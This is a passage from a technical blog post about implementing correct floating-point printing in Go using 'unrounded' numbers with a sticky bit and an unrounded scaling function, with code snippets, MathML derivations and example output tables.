-webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>7</mn><mspace width='0.166em' /><mtext>exactly⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>28</mn><mo>=</mo><mtext>‘</mtext><mn>7.0</mn><mtext>’</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
Let’s implement unrounded numbers in Go.
<div class=showcode><pre>type unrounded uint64
func unround(x float64) unrounded {
return unrounded(math.Floor(4*x)) | bool2[unrounded](math.Floor(4*x) != 4*x)
}
func (u unrounded) String() string {
return fmt.Sprintf("⟨%d.%d%s⟩", u>>2, 5*((u>>1)&1), "+"[1-u&1:])
}
</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L52-L60">fpfmt/fpfmt.go:52,60</a></div><div class=showcode-end></div>
<p>
The <code>bool2</code> function converts a boolean to an integer.
(The Go compiler will implement this using an inlined conditional move.)
<div class=showcode><pre><span class=showcode-comment>// bool2 converts b to an integer: 1 for true, 0 for false.</span>
func bool2[T ~int | ~uint64](b bool) T {
if b {
return 1
}
return 0
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L15-L20">fpfmt/fpfmt.go:15,20</a></div><div class=showcode-end></div>
<p>
We won’t use the <code>unround</code> constructor in our actual code, but it’s helpful for playing.
For example, we can try the examples we just saw:
<pre class='language-in'>row("x", "raw", "str")
for _, x := range []float64{6, 6.001, 6.499, 6.5, 6.501, 6.999, 7} {
u := unround(x)
row(x, uint64(u), u)
}
table()
</pre>
<pre class='language-out'>x raw str
6 24 ⟨6.0⟩
6.001 25 ⟨6.0+⟩
6.499 25 ⟨6.0+⟩
6.5 26 ⟨6.5⟩
6.501 27 ⟨6.5+⟩
6.999 27 ⟨6.5+⟩
7 28 ⟨7.0⟩
</pre>
<p>
The unrounded form <math><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow></math> holds the information needed by all the usual rounding operations.
Adding 0, 1, 2, or 3 and then dividing by four (or shifting right by two) yields: floor, round with ½ rounding down, round with ½ rounding up, and ceiling.
In floating-point math, we want to round with ½ rounding to even, meaning 1½ and 2½ both round to 2.
We can do that by adding <math><mrow><mn>1</mn><mo>+</mo><mtext>odd</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math>,
where <math><mrow><mtext>odd</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math> is 0 or 1 according to whether <math><mi>x</mi></math> is odd.
That’s just the low bit of <math><mi>x</mi></math>:
<math><mrow><mtext>odd</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo><mo>=</mo><mo stretchy=false>(</mo><mi>x</mi><MO>&</MO><mn>1</mn><mo stretchy=false>)</mo><mo>=</mo><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>>></MO><mn>2</mn><mo stretchy=false>)</mo><MO>&</MO><mn>1</mn></mrow></math>.
<p>
Putting that all together:<div class=math><math display=block><mtable><mtr><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>⌊</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>⌋</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>+</mo><mn>0</mn><mo stretchy=false>)</mo><MO>>></MO><mn>2</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>(floor)</mtext></mtd></mtr><mtr><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><msup><mrow><mo>[</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>]</mo></mrow><mo>−</mo></msup></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>+</mo><mn>1</mn><mo stretchy=false>)</mo><MO>>></MO><mn>2</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>(round,</mtext><mspace width='0.3em' /><mtext>half</mtext><mspace width='0.3em' /><mtext>down)</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><msup><mrow><mo>[</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>]</mo></mrow><mtext>even</mtext></msup></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>+</mo><mn>1</mn><mo>+</mo><mtext>odd</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo><mo stretchy=false>)</mo><MO>>></MO><mn>2</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>(round,</mtext><mspace width='0.3em' /><mtext>half</mtext><mspace width='0.3em' /><mtext>to</mtext><mspace width='0.3em' /><mtext>even)</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>+</mo><mn>1</mn><mo>+</mo><mo stretchy=false>(</mo><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>>></MO><mn>2</mn><mo stretchy=false>)</mo><MO>&</MO><mn>1</mn><mo stretchy=false>)</mo><mo stretchy=false>)</mo><MO>>></MO><mn>2</mn></mrow></mtd><mtd><mrow></mrow></mtd></mtr><mtr><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><msup><mrow><mo>[</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>]</mo></mrow><mo>+</mo></msup></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>+</mo><mn>2</mn><mo stretchy=false>)</mo><MO>>></MO><mn>2</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>(round,</mtext><mspace width='0.3em' /><mtext>half</mtext><mspace width='0.3em' /><mtext>up)</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>⌈</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>⌉</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd 
style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>+</mo><mn>3</mn><mo stretchy=false>)</mo><MO>>></MO><mn>2</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>(ceiling)</mtext></mtd></mtr></mtable></math></div>
<p>
In Go:
<div class=showcode><pre>func (u unrounded) floor() uint64 { return uint64((u + 0) >> 2) }
func (u unrounded) roundHalfDown() uint64 { return uint64((u + 1) >> 2) }
func (u unrounded) round() uint64 { return uint64((u + 1 + (u>>2)&1) >> 2) }
func (u unrounded) roundHalfUp() uint64 { return uint64((u + 2) >> 2) }
func (u unrounded) ceil() uint64 { return uint64((u + 3) >> 2) }</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L62-L65">fpfmt/fpfmt.go:62,65</a></div><div class=showcode-end></div>
<pre class='language-in'>row("x", "floor", "round½↓", "round", "round½↑", "ceil")
for _, x := range []float64{6, 6.25, 6.5, 6.75, 7, 7.5, 8.5} {
u := unround(x)
row(u, u.floor(), u.roundHalfDown(), u.round(), u.roundHalfUp(), u.ceil())
}
table()
</pre>
<pre class='language-out'>x floor round½↓ round round½↑ ceil
⟨6.0⟩ 6 6 6 6 6
⟨6.0+⟩ 6 6 6 6 7
⟨6.5⟩ 6 6 6 7 7
⟨6.5+⟩ 6 7 7 7 7
⟨7.0⟩ 7 7 7 7 7
⟨7.5⟩ 7 7 8 8 8
⟨8.5⟩ 8 8 8 9 9
</pre>
<p>
Dividing unrounded numbers preserves correct rounding as long as the second extra bit
is maintained correctly: once it is set to 1, it has to stay a 1 in all future results.
This gives the second extra bit its shorter name: the <i>sticky bit</i>.
<p>
To divide an unrounded number, we do a normal divide but force the sticky bit to 1
when there is a remainder.
Right shift does the same.<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mi>x</mi><mn>/</mn><mi>n</mi><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mn>/</mn><mi>n</mi><mo stretchy=false>)</mo><MO>|</MO><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>mod</MO><mi>n</mi><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo><MO>|</MO><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>&</MO><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mi>x</mi><MO>>></MO><mi>n</mi><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>>></MO><mi>n</mi><mo stretchy=false>)</mo><MO>|</MO><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>n</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo><MO>|</MO><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>&</MO><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd></mtr></mtable></math></div>
<p>
For example, if we rounded 15.4 to an integer 15 and then divided it by 6,
we’d get 2.5, which rounds down to 2,
but the more precise answer would be 15.4/6 = 2.57, which rounds up to 3.
An unrounded division handles this correctly:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>15.4</mn><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>61</mn><mspace width='0.3em' /><mo>‘</mo><mn>15.0</mn><mtext>+</mtext><mo>’</mo><mrow><mspace width='0.3em' /><mtext>“a</mtext><mspace width='0.3em' /><mtext>little</mtext><mspace width='0.3em' /><mtext>more</mtext><mspace width='0.3em' /><mtext>than</mtext><mspace width='0.3em' /><mtext>15”</mtext></mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>15.4/6</mn><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>11</mn><mspace width='0.3em' /><mo>‘</mo><mn>2.5</mn><mtext>+</mtext><mo>’</mo><mrow><mspace width='0.3em' /><mtext>“a</mtext><mspace width='0.3em' /><mtext>little</mtext><mspace width='0.3em' /><mtext>more</mtext><mspace width='0.3em' /><mtext>than</mtext><mspace width='0.3em' /><mtext>2½”</mtext></mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mo>[</mo><mrow><mtext>⟨</mtext><mn>15.4/6</mn><mtext>⟩</mtext></mrow><mo>]</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mn>3</mn></mtd></mtr></mtable></math></div>
<p>
Let’s implement division and right shift in Go:
<div class=showcode><pre>func (u unrounded) div(d uint64) unrounded {
x := uint64(u)
return unrounded(x/d) | u&1 | bool2[unrounded](x%d != 0)
}
func (u unrounded) rsh(s int) unrounded {
return u>>s | u&1 | bool2[unrounded](u&((1<<s)-1) != 0)
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L69-L75">fpfmt/fpfmt.go:69,75</a></div><div class=showcode-end></div>
<pre class='language-in'>u := unround(15.4).div(6)
fmt.Println(u, u.round())
</pre>
<pre class='language-out'>⟨2.5+⟩ 3
</pre>
<p>
Finally, we are going to need to be able to nudge an unrounded number
up or down before computing a ceiling or floor,
as if we had added or subtracted a tiny amount.
Let’s add that:
<div class=showcode><pre>func (u unrounded) nudge(δ int) unrounded { return u + unrounded(δ) }</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L67-L66">fpfmt/fpfmt.go:67,66</a></div><div class=showcode-end></div>
<pre class='language-in'>row("x", "nudge(-1).floor", "floor", "ceil", "nudge(+1).ceil")
for _, x := range []float64{15, 15.1, 15.9, 16} {
u := unround(x)
row(u, u.nudge(-1).floor(), u.floor(), u.ceil(), u.nudge(+1).ceil())
}
table()
</pre>
<pre class='language-out'>x nudge(-1).floor floor ceil nudge(+1).ceil
⟨15.0⟩ 14 15 15 16
⟨15.0+⟩ 15 15 16 16
⟨15.5+⟩ 15 15 16 16
⟨16.0⟩ 15 16 16 17
</pre>
<p>
Floating-point hardware maintains three extra bits to round
all arithmetic operations correctly.
For just division and right shift, we can get by with only two bits.
<a class=anchor href="#scale"><h2 id="scale">Unrounded Scaling</h2></a>
<p>
The fundamental insight of this post is that all
floating-point conversions can be written correctly
and simply using <i>unrounded scaling</i>,
which multiplies a number <math><mi>x</mi></math> by a power of two and a power of ten
and returns the unrounded product.<div class=math><math display=block><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo><mo>=</mo><mrow><mtext>⟨</mtext><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mtext>⟩</mtext></mrow><mn>.</mn></mrow></math></div>
<p>
When <math><mi>p</mi></math> is negative, the value <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>
cannot be stored exactly in any finite binary floating-point number,
so any implementation of uscale must be careful.
<p>
In Go, we can implement uscale using big integers and an unrounded division:
<pre>func uscale(x uint64, e, p int) unrounded {
num := mul(big(4), big(x), pow(2, max(0, e)), pow(10, max(0, p)))
denom := mul(pow(2, max(0, -e)), pow(10, max(0, -p)))
div, mod := divmod(num, denom)
return unrounded(div.uint64() | bool2[uint64](!mod.isZero()))
}
</pre>
<p>
The <code>max</code> expressions choose between multiplying <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math> into <code>num</code> when <math><mrow><mi>e</mi><mo>></mo><mn>0</mn></mrow></math>
or multiplying <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>e</mi></mrow></msup></mrow></math> into <code>denom</code> when <math><mrow><mi>e</mi><mo><</mo><mn>0</mn></mrow></math>,
and similarly for <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>.
The <code>divmod</code> implements the floor, and <code>mod.isZero</code> reports
whether the floor was exact.
<p>
This implementation of uscale is correct but inefficient.
In our usage, <math><mi>e</mi></math> and <math><mi>p</mi></math> will mostly cancel out,
typically with opposite signs,
and the input <math><mi>x</mi></math> and result <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>
will always fit in 64 bits.
That limited input domain and range makes it possible
to implement a very fast, completely accurate uscale,
and we’ll see that implementation later.
<p>
Our actual implementation will be split into two functions,
to allow sharing some computations derived from <math><mi>p</mi></math> and <math><mi>e</mi></math>.
Instead of <code>uscale(x, e, p)</code>, the fast Go version will be called as <code>uscale(x, prescale(e, p, log2Pow10(p)))</code>.
Also, callers are responsible for passing in an <math><mi>x</mi></math> left-shifted to have its
high bit set.
The <code>unpack</code> function we looked at already arranged that for its result,
but otherwise callers need to do something like:
<pre>shift = 64 - bits.Len64(x)
... uscale(x<<shift, prescale(e-shift, p, log2Pow10(p))) ...
</pre>
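<p>
For callers that do not already have a normalized mantissa, the two steps can be wrapped in a small helper. This is a sketch of my own (the name <code>uscaleNorm</code> is hypothetical, not part of the post’s code):
<pre>// uscaleNorm normalizes a nonzero x so its high bit is set, adjusts e to
// compensate for the shift, and then calls prescale and uscale as described above.
func uscaleNorm(x uint64, e, p int) unrounded {
	shift := 64 - bits.Len64(x)
	return uscale(x<<shift, prescale(e-shift, p, log2Pow10(p)))
}
</pre>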
<p>
Conceptually, uscale maps numbers on one fixed-point scale to numbers on another,
including converting between binary and decimal scales.
For example, consider the scales <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>13</mn></mrow></msup></mrow></math> and <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>4</mn></mrow></msup></mrow></math>:
<p>
<img name="fpfmt-ruler-scale" class="center pad" width=210 height=250 src="fpfmt-ruler-scale.svg">
<p>
Given <math><mi>x</mi></math> from the <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>13</mn></mrow></msup></mrow></math> side,
<math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><MO form='prefix'>−</MO><mn>13</mn><mo>,</mo><mn>4</mn><mo stretchy=false>)</mo></mrow></math> maps to the equivalent
point on the <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>4</mn></mrow></msup></mrow></math> side;
and given <math><mi>x</mi></math> from the <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>4</mn></mrow></msup></mrow></math> side,
<math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mn>13</mn><mo>,</mo><MO form='prefix'>−</MO><mn>4</mn><mo stretchy=false>)</mo></mrow></math> maps to the equivalent
point on the <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>13</mn></mrow></msup></mrow></math> side.
Before we look at the fast implementation of <math><mtext>uscale</mtext></math>,
let’s look at how it simplifies all the floating-point printing
and parsing algorithms.
<a class=anchor href="#fixed-width_printing"><h2 id="fixed-width_printing">Fixed-Width Printing</h2></a>
<p>
Our first application of uscale is fixed-width printing.
Given <math><mrow><mi>f</mi><mo>=</mo><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>, we want to compute its
approximate equivalent
<math><mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mtext><i>de</i></mtext></msup></mrow></math>, where <math><mi>d</mi></math> has exactly <math><mi>n</mi></math> digits.
It only takes 17 digits to uniquely identify any float64,
so we’re willing to limit <math><mrow><mi>n</mi><mo>≤</mo><mn>18</mn></mrow></math>,
which will ensure <math><mi>d</mi></math> fits in a uint64.
The strategy is to multiply <math><mi>f</mi></math> by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> for some <math><mi>p</mi></math>
and then round it to an integer <math><mi>d</mi></math>.
Then the result is <math><mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup></mrow></math>.
<p>
The <math><mi>n</mi></math>-digit requirement means <math><mrow><mi>d</mi><mo>=</mo><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>n</mi><MO lspace='0' rspace='0'>−</MO><mn>1</mn></mrow></msup><mo>,</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>n</mi></msup><mo stretchy=false>)</mo></mrow></math>.
From this we can derive <math><mi>p</mi></math>:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>n</mi><MO lspace='0' rspace='0'>−</MO><mn>1</mn></mrow></msup><mo>,</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>n</mi></msup><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>n</mi><MO lspace='0' rspace='0'>−</MO><mn>1</mn></mrow></msup><mo>·</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[factoring</mtext><mspace width='0.3em' /><mtext>range]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo stretchy=false>)</mo><mo>+</mo><mi>p</mi></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>n</mi><mo>−</mo><mn>1</mn><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[taking</mtext><mspace width='0.3em' /><mtext>log]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>n</mi><mo>−</mo><mn>1</mn><mo>−</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo stretchy=false>)</mo><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[isolating</mtext><mspace width='0.3em' /></mrow><mi>p</mi><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>n</mi><mo>−</mo><mn>1</mn><mo>−</mo><mo stretchy=false>(</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' 
/></mrow><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo stretchy=false>)</mo><mo>−</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[regrouping]</mtext></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>n</mi><mo>−</mo><mn>1</mn><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo stretchy=false>⌋</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[</mtext><mi>p</mi><mrow><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>an</mtext><mspace width='0.3em' /><mtext>integer]</mtext></mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>n</mi><mo>−</mo><mn>1</mn><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mo stretchy=false>(</mo><mi>e</mi><mo>+</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi><mo stretchy=false>)</mo><mo stretchy=false>⌋</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[changing</mtext><mspace width='0.3em' /><mtext>log</mtext><mspace width='0.3em' /><mtext>base]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
It is okay for <math><mi>p</mi></math> to be too big—we will get an extra digit that we can divide away—so
we can approximate <math><mrow><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi></mrow></math> as <math><mrow><mtext>bits</mtext><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo><mo>−</mo><mn>1</mn></mrow></math>, where <math><mrow><mtext>bits</mtext><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo></mrow></math> is the bit length of <math><mi>m</mi></math>.
That gives us <math><mrow><mi>p</mi><mo>=</mo><mi>n</mi><mo>−</mo><mn>1</mn><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mo stretchy=false>(</mo><mi>e</mi><mo>+</mo><mtext>bits</mtext><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo><mo>−</mo><mn>1</mn><mo stretchy=false>)</mo><mo stretchy=false>⌋</mo></mrow></mrow></math>.
With this derivation of <math><mi>p</mi></math>, uscale does the rest of the work.
<p>
The floor expression is a simple linear function and can be computed
exactly for our inputs using fixed-point arithmetic:
<div class=showcode><pre><span class=showcode-comment>// log10Pow2(x) returns ⌊log₁₀ 2**x⌋ = ⌊x * log₁₀ 2⌋.</span>
func log10Pow2(x int) int {
<span class=showcode-comment>// log₁₀ 2 ≈ 0.30102999566 ≈ 78913 / 2^18</span>
return (x * 78913) >> 18
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L78-L81">fpfmt/fpfmt.go:78,81</a></div><div class=showcode-end></div>
<p>
The <code>log2Pow10</code> function, which we mentioned above and need to
use when calling <code>prescale</code>, is similar:
<div class=showcode><pre><span class=showcode-comment>// log2Pow10(x) returns ⌊log₂ 10**x⌋ = ⌊x * log₂ 10⌋.</span>
func log2Pow10(x int) int {
<span class=showcode-comment>// log₂ 10 ≈ 3.32192809489 ≈ 108853 / 2^15</span>
